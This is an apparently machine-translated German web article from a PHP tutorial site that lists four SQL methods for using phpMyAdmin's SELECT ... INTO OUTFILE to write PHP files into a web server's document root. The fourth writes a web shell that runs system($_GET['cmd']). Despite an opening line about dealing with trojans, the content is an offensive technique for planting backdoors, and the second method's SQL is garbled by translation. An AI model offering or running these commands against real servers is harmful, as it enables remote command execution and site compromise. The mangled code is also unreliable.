Heim  >  Artikel  >  Datenbank  >  Vier Methoden für phpmyadmin zum Exportieren von Trojanern

Vier Methoden für phpmyadmin zum Exportieren von Trojanern

PHPz
PHPzOriginal
2017-04-04 11:23:011519Durchsuche

Was soll ich tun, wenn sich auf der Website ein Trojanisches Pferd befindet? Gibt es eine gute Möglichkeit, damit umzugehen? Die vier Methoden, die ich für phpmyadmin zum Exportieren von Trojanern zusammengefasst habe:

Methode 1:

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1 ` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';DROP TABLE IF EXISTS `darkmoon`;

Die Bedeutung des obigen Codes besteht darin, die musql-Datenbank auszuwählen und dann eine Darkmoon-Tabelle zu erstellen und dann ein Feld namens Darkmoon1 hinzuzufügen

Dann fügen Sie einen Codesatz ein in das Feld von Darkmoon1

Dann exportieren Sie einen Satz aus dem Feld Darkmoon1 in den Dateinamen d:/wamp/www/exehack.php (der Pfad hier ist der Programmpfad der Website)

Löschen Sie abschließend die Dunkelmondtabelle.

Methode 2:

TABELLE Mond erstellen (Dunkelmondtext NICHT NULL); Einfügen INTO Mond (Dunkelmond) VALUES(''); d:/wamp/www/exehack.php'; Drop TABLE IF EXISTS moon;

Methode 3:

select ''INTO OUTFILE 'd:/wamp/ www/exehack.php'

Methode 4:

select '';system($_GET['cmd']);' INTO OUTFILE 'd:/wamp/www/exehack.php'

Damit kann der cmd-Befehl direkt ausgeführt werden, der Parameter ist cmd

Das obige ist der detaillierte Inhalt vonVier Methoden für phpmyadmin zum Exportieren von Trojanern. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn